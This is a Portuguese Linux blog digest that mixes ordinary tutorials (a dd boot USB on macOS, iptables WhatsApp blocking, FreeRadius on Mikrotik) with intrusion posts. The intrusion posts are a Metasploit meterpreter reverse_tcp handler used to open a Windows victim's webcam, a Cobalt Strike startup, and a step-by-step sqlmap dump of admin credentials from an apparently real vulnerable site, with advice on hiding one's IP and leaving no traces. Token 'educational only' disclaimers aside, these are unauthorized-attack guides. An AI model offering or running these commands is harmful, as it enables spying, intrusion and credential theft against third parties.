Criando Pendrive de Boot do Linux no Mac por linha de comando
Boas Users!
Criaremos um pendrive de boot no OS X
1- Conecte o pendrive no Mac, e acesse um terminal pelo Spotlight (⌘ + Tecla Espaço) ou diretamente através do diretório /Applications/Utilities/
2- Execute o seguinte comando no terminal, ” diskutil list ” o retorno do comando pode variar de acordo com o Mac
$diskutil list
3- Identifique o disco relativo ao Pendrive, neste caso, é o disk1
4- Desmonte o disco, com o comando “diskutil unmountDisk”
$diskutil unmountDisk /dev/disk1
5- Com o comando o disco esteja desmontado, você poderá acessa-lo e altera-lo à baixo nível.
Localize a imagem ISO que deseja gravar no Pendrive ou copie-a para um local de fácil “acesso”.
Para efetuar a cópia, iremos utilizar o utilitário dd, o qual já se encontra disponível no Mac OS X.
Para saber mais sobre o dd, basta consultar o Manual, digitando “man dd” no Terminal.
A sintaxe básica do dd é:
dd if=origem of=destino
6- Substitua origem e destino, pelo arquivo ISO e pelo disco de destino respectivamente, logo teremos algo semelhante à:
dd if=ubuntu-13.04-server-amd64.iso of=/dev/rdisk1 bs=128m
OBS: Note que, para acelerar o processo de cópia, complementamos o comando, definindo parâmetro block size (bs) como 128m e alteramos o disco de destino incluindo um “r” antes de “disk1“.
O bs indica que os blocos de leitura e escrita devem possuir o mesmo tamanho, enquanto que o “r” define que o disco deve ser acessado no modo raw.
Quando o processo de cópia for concluído, você receberá uma mensagem informando o tempo decorrido e a quantidade de bytes transferidos.
Tudo pronto, agora basta desconectar o Pendrive e utiliza-lo.
By user777
Instalação do PCBSD 10.3
PC-BSD é um sistema operacional Desktop baseado no FreeBSD.
Ao invés do usuário ter que baixar e configurar o seu próprio ambiente de trabalho o que pode ser demorado.
O PCBSD visa tornar a experiência FreeBSD fácil e viável para o usuário médio “casual”
Neste tutorial, vamos instalar o PCBSD 10.3.
Passo 1 – Transferir.
Clique Aqui para obter o PCBSD.
Passo 2 – Comece o Instalar.
Bloqueio Seletivo Whatsapp usando Iptables
Olá, meu nome é Thiago Ferreira e sou um dos colaboradores do PrefiroLinux, hoje mostrarei como podemos executar um bloqueio seletivo de whatsapp e facebook usando apenas o iptables. Muito útil em ambientes onde se usa proxy transparente e não há a possibilidade exectuar os devidos bloqueios e liberação pelas ACL’s do squid.
Aqui faremos de uma forma simples que requer apenas o conhecimento dos ips a serem bloqueados , estes se tratando da rede interna. E os ips que serão liberados, no caso apresentado os ips de nível publico.
Aqui deixo o script de forma bem simples, comentada e bem apresentado, inclusive com a notação de que cada comando fará, como o iptables tratará as regras básicas descritas.
Esse conteúdo originalmente foi incluído em minhas rotinas de bloqueio por volta de junho de 2015, após pesquisas feitas principalmente no linuxquestions.org e adaptado as minhas necessidades. Então, para futuras duvidas e buscas a base de busca deve ser o linuxquestions.
Sendo que aqui no nosso fórum temos o devido espaço para quaisquer esclarecimentos, vide;
http://forum.prefirolinux.com
As linhas são auto explicativas, os comentários devem permanecer com o “#” antes das linhas que não são parte do script afim de evitar quaisquer erro de leitura do bash.
Criem os arquivos, bloqueio_seletivo, ipsliberados e ipsinterno
$nano /usr/share/bloqueio_seletivo
e dentro dele insira o seguinte script
Na lista de ipsliberados entre com os ips disponiveis no proprio site do whatsapp: https://www.whatsapp.com/cidr.txt .
Basta adicionar a lista a um arquivos em “/usr/share” :
$nano /usr/share/ipsliberados
Como exemplo, poderiamos ter uma serie de ips nessa ordem:
31.13.58.55
31.55.44.77
178.88.14.100
Adicione os ips, e crie um novo arquivo para inserirmos os ips da rede interna:
$nano /usr/share/ipsinterno
Em ipsinterno insiram os ips da sua rede, lembrando de seguir a seguinte regra.
Ips que serão bloqueados devem conter o “#” antes, pois o cut fará a leitura levando em consideração que esses são os unicos que devem ser tratados.
#10.10.10.44
#10.10.10.24
10.10.10.8
No caso acima, somente os dois primeiros serão bloqueados de acessar os serviços dos “ipsliberados”, o “10.10.10.8” terá total acesso ao trafego.
Caso deseje, liste apenas os ips permitidos, sem a necessidade de usar o “#” antes do ip, ficando assim:
10.10.10.55
10.10.10.22
…
Aqui um exemplo do script limpo e sem comentarios…
Lembrem-se, leia todo o conteúdo do post inclusive do script para melhor entendimento.
Suporte no forum do prefirolinux.
Boa diversão
Invadindo Webcam conectada no windows com “Kali Linux”
Boas Users!
Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”
Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.
Comandos usados no acesso;
use exploit/multi/handler
use exploit/multi/handler= Carregando módulo a ser usado
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp= método utilizado
set lhost
set lhost= inserir o ip do kali
set lport
set lport= inserir a porta a ser utilizada
exploit
exploit = execução do backdoor
webcam_list
webcam_list= mostra se tem alguma webcam conectada
webcam_list
webcam_stream= abre a webcam remota, localmente
By user777
Invadindo com CobaltStrike ( kali Linux )
Boas Users!
Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike
“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”
Comandos utilizados:
$ cd
cd= Navegar entre os diretórios
$ sudo ./teamserver 127.0.0.1 123456
sudo= Permissão de super usuário
./teamserver= Iniciando servidor do cobalt strike
127.0.0.1= IP LoopBack
123456= Senha
$ sudo ./cobaltstrike
./cobaltstrike= Iniciando o cobaltstrike
Fonte:
https://www.cobaltstrike.com/features
Softwares usados:
By user777
Configurando Servidor FreeRadius + Mysql para PPPOE no Mikrotik(Parte 1)
Fala meus bons e amados irmãos de guerra, hoje vamos ver em simples passos como criar um um servidor de Radius para autenticação de usuários do mikrotik em pppoe no servidor Mysql.
Basicamente a estrutura se resume no seguinte.
* Essa RB ai é só pra descrever o que usei.
Rb com 5 portas, rodando RouterOs 5.25
Turnkey linux 14 baseado no Debian Jessie 8
Freeradius + Mysql
Na nossa routerboard temos 5 portas, usaremos apenas 3, uma para comunicação com o servidor radius, uma para rede de clientes e uma para conexão com a internet.
O Cenário é basicamente esse abaixo:
RB – Porta Ether1 > 10.2.2.13/28 (Internet)
RB – Porta Ether3 > 10.1.1.1/24 (Conexão com o Freeradius)
RB – Porta Ether5 > 10.2.3.1 (Com pool para Clientes PPPoE)
Linux Server – eth0 : 10.1.1.10/24
Cliente 10.2.3.150 (Endereço Já entregue pelo PPPoE após discar)
Bom, o procedimento é bem simples como descrito no vídeo, que embora um pouco longo é bem satisfatório.
Bom, basicamente é isso. O restante do conteúdo pode ser visto no vídeo.
Abraços, e vamos a parte 2
Estará disponível AQUI
Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux
Boas Users!
Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:
1– esse erro ocorre geralmente, com pendrive.
2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.
3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.
4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.
5– se estiver no linux, Primeiro acesse o terminal como root:
su
Agora vamos acessar o /media:
# cd /media
E então crie um diretório onde deverá ser armazenado a nossa ISO:
# mkdir /diretorio_ISO
Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:
# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop
By user777
Sql Injection com sqlmap – Fácil, Rápido e Perigoso!
Amigos, boa semana a todos.
Estarei postando algumas informações sobre o SQLMAP, forma de uso e um teste pratico com a ferramenta.
Antes de tudo, É preciso saber que não nos responsabilizamos por quaisquer danos causados a terceiros enquanto usando essa e outras ferramentas apresentadas no site.
O sqlmap tem a finalidade de facilitar as injeções de sql, assim trazendo ao processo de “sql injection” uma facilidade quando no ato de testes.
Existem diversas formas de proceder esses testes, uma delas é fazer o processo manualmente diretamente na barra de URL no destino (lik do site) . Já o sqlmap tem a proposta de facilitar todo o processo, automatizando os comandos, testes e até buscando por possíveis passwords se utilizado os programas corretos.
1 – Apresentação, Site Oficial e Testes –
A apresentação do SqlMap é feita diretamente no seu man page, para isso podemos usar o comando:
man sqlmap
Teremos como saída um resultado similar a este abaixo:
O site oficial do sqlmap pode ser consultado no seguinte endereço : http://sqlmap.org/
Os teste a seguir foram executados com cautela para que não ficassem expostos os dados da maquina realizadora dos ataques. Assim, sugiro a todos que busquem antes de executar testes façam o devido mascaramento de seus endereços Ips.
O Alvo usado foi um site localizado a partir de um script qual tem a função especifica de buscar as falhas, me dando o resultado dos sites vulneráveis ao sqlinjection.
O Ataque:
Inicialmente vou guardar o link do site que vou atacar em uma Variável, assim facilitará para mim realizar o procedimento sem ter que ficar diversas vezes digitando o endereço onde a referência de vulnerabilidade foi encontrada.
Ex : http://site.com/php?=id55487
Então, façamos o seguinte passo:
root@love:/#URLSQL=www.site.com/php?=id55487
E iniciamos o nosso Scan usando a Variavel onde está armazenada o endereço URL.
root@love:/# sqlmap -u $URLSQL –dbs
Vejam na imagem abaixo, após rodar o sqlmap que já é possível determinar as databases do site, isso porque a flag < –dbs > ao final do link diz ao programa para listar as databases, claro isso se o site oferecer a vulnerabilidade para o escaneamento.
Após termos a lista de databases (banco de dados) do nosso alvo, então é hora de testarmos a database escolhida, pedindo ao sqlmap para exibir as tabelas do banco, para isso é necessário usar o conjuto de flags < -D <database> –table >.
De certa forma, podemos eventualmente alcançar alguns erros, mas nada que nos impeça de tentar novamente,até conseguirmos algo. Como neste caso não houve erro, prossigo…
root@love:/# sqlmap -u $URLSQL -D dbserver3 –tables
Logo que este passo for concluido, teremos as seguintes informações: Tabelas do banco de dados solicitado acima. EX:
Agora , cabe a nós continuarmos, e especificar qual tabela ou tabelas desejamos obter informações , para tal basta continuarmos o teste especificando a tabela qual obteremos uma ou mais colunas.
root@love:/# sqlmap -u $URLSQL -D dbserver3 -T admin_user –columns
Logo obteremos os seguintes dados:
Agora só nos resta definir quais colunas queremos um “dump”, quais vamos buscar os dados, assim então rodamos o sqlmap da seguinte forma:
root@love:/# sqlmap -u $URLSQL -D dbserver3 -T admin_user -C admin_email,admin_pass,_admin_username –dump
Veja que usamos o “-C” para especificar as colunas desejadas e o “–dump” para obtermos as informações das colunas listadas.
Durante o scan o sqlmap nos dá a opção de crackear informações com um ataque de dicionário, no caso eu optei por não fazê-lo.
Bom, logicamente ainda falta muito para se chegar a “invadir” este site, mas a proposta desse tópico foi referenciar a facilidade para se chegar a senhas e informações de um site que esteja vulnerável a este tipo de ataque.
Eu recomendo a todos que caso façam os testes se privem a somente testar, que não entrem em sites desconhecidos a menos que você tenha o conhecimento específico para não ser encontrado ou não deixar rastros. No mais fica mais essa dica e que todos possam usá-la como fonte de estudo somente.